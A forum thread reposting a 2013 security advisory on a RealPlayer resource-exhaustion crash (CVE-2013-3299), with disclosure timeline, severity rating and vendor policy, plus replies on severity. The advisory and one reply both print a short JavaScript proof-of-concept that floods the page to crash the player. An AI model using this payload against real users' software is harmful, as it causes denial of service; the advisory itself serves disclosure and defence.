Matt Posted July 3, 2013 Report Posted July 3, 2013 Description : Real Player versions 16.0.2.32 and below suffer from a denial of service vulnerabilityAuthor : Akshaysinh VaghelaSource : Real Player 16.0.2.32 Resource Exhaustion ? Packet StormCode : Title:====Real player resource exhaustion VulnerabilityCredit:======Name: Akshaysinh VaghelaCompany/affiliation: Cyberoam Technologies Private LimitedWebsite: www.cyberoam.comCVE:=====CVE-2013-3299Date:====2013-04-23CL-ID:====CRD-2013-03Vendor:======Real Networks creates products and services that make it easier for people to access and enjoy digital media on the devices and platforms they choose to use.Product:=======Real Player: The first application that allows enables people to easily download online video, transfer it to a favorite device and share it with friends via Facebook and Twitter.Product link: http://in.real.com/?mode=rpAbstract:=======Cyberoam Threat Research Labs discovered a Resource exhaustion Vulnerability in Real Player <= 16.0.2.32 .Report-Timeline:============2013-04-23: Vendor notification2013-05-23: Vendor's Last Response2013-06-03: Notification Follow-up Date2013-00-00: Vendor Fix/Patch2013-06-04: Public DisclosureAffected Version:=============Ver ( <= 16.0.2.32 )Exploitation-Technique:===================NetworkSeverity Rating:===================9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C)Details:=======Real Networks Real Player is prone to Resource exhaustion vulnerability. When processing specially crafted HTML file, Real Player uses a value from the file to control a loop operation. Real player fails to validate the value before using it, which leads to DoS / Crash.Caveats / Prerequisites:======================The attacker needs to entice victims to perform an action in order to exploit this vulnerability.Proof Of Concept:================http://i40.tinypic.com/2mg1gt3.jpghttp://i39.tinypic.com/5phchx.pngPOC Exploit code:<html><head><script language="JavaScript"> { var buffer = '\x41' for(i=0; i <= 100 ; ++i) { buffer+=buffer+buffer document.write(buffer); }}</script></head></html>Risk:=====The security risk of the Resource exhaustion Vulnerability is estimated as High.Disclaimer:===========The information provided in this advisory is provided as it is without any warranty. Any modified copy or reproduction, including partially usages, of this file requires authorization from Cyberoam Vulnerability Research Team. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Cyberoam Vulnerability Research Team.The first attempt at contact will be through any appropriate contacts or formal mechanisms listed on the vendor Web site, or by sending an e-mail with the pertinent information about the vulnerability. Simultaneous with the vendor being notified, Cyberoam may distribute vulnerability protection filters to its customers' IPS devices through the IPS upgrades.If a vendor fails to respond after five business days, Cyberoam Vulnerability Research Team may issue a public advisory disclosing its findings fifteen business days after the initial contact.If a vendor response is received within the timeframe outlined above, Cyberoam Vulnerability Research Team will allow the vendor 6-months to address the vulnerability with a patch. At the end of the deadline if a vendor is not responsive or unable to provide a reasonable statement as to why the vulnerability is not fixed, the Cyberoam Vulnerability Research Team will publish a limited advisory to enable the defensive community to protect the user. We believe that by doing so the vendor will understand the responsibility they have to their customers and will react appropriately.Cyberoam Vulnerability Research Team will make every effort to work with vendors to ensure they understand the technical details and severity of a reported security flaw. If a product vendor is unable to, or chooses not to, patch a particular security flaw, Cyberoam Vulnerability Research Team will offer to work with that vendor to publicly disclose the flaw with some effective workarounds.Before public disclosure of a vulnerability, Cyberoam Vulnerability Research Team may share technical details of the vulnerability with other security vendors who are in a position to provide a protective response to a broader user base. Quote
Edu19 Posted July 4, 2013 Report Posted July 4, 2013 if you can reliably overwrite buffers in memory and successfully inject a shellcode, then the bug severity is high.if it is not reliable...then medium.if this only freezes or crashes the app, then severity is low. by the way, in theory if this works in Real Player, it should work on Internet Explorer or at least other programs that hosts the IE webbrowser control, because RP hosts it to process HTML code. Quote
neox Posted July 4, 2013 Report Posted July 4, 2013 pocul asta este de cand eram eu tanar folosesc toti la ori ce firefox,real player etc.. si todauna zic ca este o conceptie noua <html><head><script language="JavaScript"> { var buffer = '\x41' for(i=0; i <= 100 ; ++i) { buffer+=buffer+buffer document.write(buffer); }}</script></head></html> Quote